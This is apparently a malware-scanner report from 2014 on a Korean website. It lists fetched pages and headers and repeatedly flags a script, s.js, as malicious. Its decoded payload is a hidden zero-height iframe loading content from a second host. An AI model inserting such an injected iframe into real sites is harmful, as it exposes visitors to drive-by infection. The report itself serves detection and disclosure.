Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yescook.co.kr
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://yescook.co.kr/ | HTTP/1.1 200 OK Cache-Control: private Date: Thu, 24 Jul 2014 03:01:24 GMT Server: Microsoft-IIS/6.0 Content-Length: 57 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQRSRAQQ=BJEGIKBACHMFIIIHFBDABMDG; path=/ X-Powered-By: ASP.NET | clean |
http://yescook.co.kr/default.asp | 200 OK Content-Length: 36321 Content-Type: text/html | clean |
http://yescook.co.kr/./s.js | 200 OK Content-Length: 8198 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antivirus engines (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i>a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p, Mn55 = "/Member/Member_Email_Refuse.asp?mn=Mn55"; Mn56 = "/Member/ContactUs.asp?mn=Mn56"; Mn57 = "/Member/Member_Edit.asp?mn=Mn57"; Mn58 = "/Member/Cong_History.asp?mn=Mn58"; Mn59 = "/Member/Member_Secession.asp?mn=Mn59"; Mn5A = "/Member/Member_Legal_Notice.asp?mn=Mn5A"; Mn7 = "/Etc/Sitemap.asp?mn=Mn7"; Mn70 = "/Etc/Sitemap.asp?mn=Mn70"; function goURL(name) { document.location.href = name; } Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> (The decoded payload is a zero-height, effectively invisible iframe that pulls content from a second host, gangpan.co.kr, into any page that loads s.js. The listing above appears to be an excerpt of the 8198-byte file: none of the functions shown writes the iframe, so the encoded portion that produces it is not reproduced here.) Antivirus reports:
| ||
http://yescook.co.kr/htm/mem01.htm | HTTP/1.1 200 OK Cache-Control: private Date: Thu, 24 Jul 2014 03:01:31 GMT Server: Microsoft-IIS/6.0 Content-Length: 79 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQRSRAQQ=HJEGIKBAKCPGKKCJAOJFEIHI; path=/ X-Powered-By: ASP.NET | clean |
http://yescook.co.kr/htm/../member/login_scr.asp?tag=login | 200 OK Content-Length: 17079 Content-Type: text/html | clean |
http://yescook.co.kr/htm/../member/../s.js | 200 OK Content-Length: 8198 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i>a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p, Mn55 = "/Member/Member_Email_Refuse.asp?mn=Mn55"; Mn56 = "/Member/ContactUs.asp?mn=Mn56"; Mn57 = "/Member/Member_Edit.asp?mn=Mn57"; Mn58 = "/Member/Cong_History.asp?mn=Mn58"; Mn59 = "/Member/Member_Secession.asp?mn=Mn59"; Mn5A = "/Member/Member_Legal_Notice.asp?mn=Mn5A"; Mn7 = "/Etc/Sitemap.asp?mn=Mn7"; Mn70 = "/Etc/Sitemap.asp?mn=Mn70"; function goURL(name) { document.location.href = name; } Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://yescook.co.kr/htm/../htm/../default.htm | HTTP/1.1 200 OK Cache-Control: private Date: Thu, 24 Jul 2014 03:01:35 GMT Server: Microsoft-IIS/6.0 Content-Length: 57 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQRSRAQQ=LJEGIKBABAKLFNCMELGJJNML; path=/ X-Powered-By: ASP.NET | clean |
http://yescook.co.kr/htm/../htm/../default.asp | 200 OK Content-Length: 36321 Content-Type: text/html | clean |
http://yescook.co.kr/htm/../htm/.././s.js | 200 OK Content-Length: 8198 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i>a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p, Mn55 = "/Member/Member_Email_Refuse.asp?mn=Mn55"; Mn56 = "/Member/ContactUs.asp?mn=Mn56"; Mn57 = "/Member/Member_Edit.asp?mn=Mn57"; Mn58 = "/Member/Cong_History.asp?mn=Mn58"; Mn59 = "/Member/Member_Secession.asp?mn=Mn59"; Mn5A = "/Member/Member_Legal_Notice.asp?mn=Mn5A"; Mn7 = "/Etc/Sitemap.asp?mn=Mn7"; Mn70 = "/Etc/Sitemap.asp?mn=Mn70"; function goURL(name) { document.location.href = name; } Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://yescook.co.kr/htm/../htm/../ | HTTP/1.1 200 OK Cache-Control: private Date: Thu, 24 Jul 2014 03:01:40 GMT Server: Microsoft-IIS/6.0 Content-Length: 57 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQRSRAQQ=PJEGIKBAPJGMCMKODAAMKLOF; path=/ X-Powered-By: ASP.NET | clean |
http://yescook.co.kr/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://yescook.co.kr/htm/sitemap.htm | 200 OK Content-Length: 38014 Content-Type: text/html | clean |
http://yescook.co.kr/htm/../s.js | 200 OK Content-Length: 8198 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i>a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p, Mn55 = "/Member/Member_Email_Refuse.asp?mn=Mn55"; Mn56 = "/Member/ContactUs.asp?mn=Mn56"; Mn57 = "/Member/Member_Edit.asp?mn=Mn57"; Mn58 = "/Member/Cong_History.asp?mn=Mn58"; Mn59 = "/Member/Member_Secession.asp?mn=Mn59"; Mn5A = "/Member/Member_Legal_Notice.asp?mn=Mn5A"; Mn7 = "/Etc/Sitemap.asp?mn=Mn7"; Mn70 = "/Etc/Sitemap.asp?mn=Mn70"; function goURL(name) { document.location.href = name; } Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://yescook.co.kr/htm/../default.htm | HTTP/1.1 200 OK Cache-Control: private Date: Thu, 24 Jul 2014 03:01:48 GMT Server: Microsoft-IIS/6.0 Content-Length: 57 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQRSRAQQ=CKEGIKBAKCEFODFIMBPLKKPM; path=/ X-Powered-By: ASP.NET | clean |
http://yescook.co.kr/htm/../default.asp | 200 OK Content-Length: 36321 Content-Type: text/html | clean |
http://yescook.co.kr/htm/.././s.js | 200 OK Content-Length: 8198 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i>a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p, Mn55 = "/Member/Member_Email_Refuse.asp?mn=Mn55"; Mn56 = "/Member/ContactUs.asp?mn=Mn56"; Mn57 = "/Member/Member_Edit.asp?mn=Mn57"; Mn58 = "/Member/Cong_History.asp?mn=Mn58"; Mn59 = "/Member/Member_Secession.asp?mn=Mn59"; Mn5A = "/Member/Member_Legal_Notice.asp?mn=Mn5A"; Mn7 = "/Etc/Sitemap.asp?mn=Mn7"; Mn70 = "/Etc/Sitemap.asp?mn=Mn70"; function goURL(name) { document.location.href = name; } Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://yescook.co.kr/htm/../ | HTTP/1.1 200 OK Cache-Control: private Date: Thu, 24 Jul 2014 03:01:53 GMT Server: Microsoft-IIS/6.0 Content-Length: 57 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQRSRAQQ=IKEGIKBAHKLCBHEKHLPADFBH; path=/ X-Powered-By: ASP.NET | clean |
http://yescook.co.kr/htm/info06.htm | HTTP/1.1 200 OK Cache-Control: private Date: Thu, 24 Jul 2014 03:01:55 GMT Server: Microsoft-IIS/6.0 Content-Length: 78 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQRSRAQQ=JKEGIKBAJECFOCOBJBMCFPHK; path=/ X-Powered-By: ASP.NET | clean |
http://yescook.co.kr/htm/../bbs_news_file/bbs.asp?code=n6 | 200 OK Content-Length: 23966 Content-Type: text/html | clean |
http://yescook.co.kr/htm/../bbs_news_file/../s.js | 200 OK Content-Length: 8198 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i>a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p, Mn55 = "/Member/Member_Email_Refuse.asp?mn=Mn55"; Mn56 = "/Member/ContactUs.asp?mn=Mn56"; Mn57 = "/Member/Member_Edit.asp?mn=Mn57"; Mn58 = "/Member/Cong_History.asp?mn=Mn58"; Mn59 = "/Member/Member_Secession.asp?mn=Mn59"; Mn5A = "/Member/Member_Legal_Notice.asp?mn=Mn5A"; Mn7 = "/Etc/Sitemap.asp?mn=Mn7"; Mn70 = "/Etc/Sitemap.asp?mn=Mn70"; function goURL(name) { document.location.href = name; } Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://yescook.co.kr/htm/../htm/info04_01.htm | 200 OK Content-Length: 24949 Content-Type: text/html | clean |
http://yescook.co.kr/htm/../htm/../s.js | 200 OK Content-Length: 8198 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i>a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p, Mn55 = "/Member/Member_Email_Refuse.asp?mn=Mn55"; Mn56 = "/Member/ContactUs.asp?mn=Mn56"; Mn57 = "/Member/Member_Edit.asp?mn=Mn57"; Mn58 = "/Member/Cong_History.asp?mn=Mn58"; Mn59 = "/Member/Member_Secession.asp?mn=Mn59"; Mn5A = "/Member/Member_Legal_Notice.asp?mn=Mn5A"; Mn7 = "/Etc/Sitemap.asp?mn=Mn7"; Mn70 = "/Etc/Sitemap.asp?mn=Mn70"; function goURL(name) { document.location.href = name; } Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yescook.co.kr
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 24 Jul 2014 03:01:24 GMT
Server: Microsoft-IIS/6.0
Content-Length: 57
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQRSRAQQ=BJEGIKBACHMFIIIHFBDABMDG; path=/
X-Powered-By: ASP.NET
...57 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yescook.co.kr
Referer: http://www.google.com/search?q=yescook.co.kr
Result:
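The result is similar to the first query. There are no suspicious redirects found. This check covers referrer-dependent redirects only; the malicious s.js listed under "Scanned pages/files" is a separate finding and is not cleared by this result.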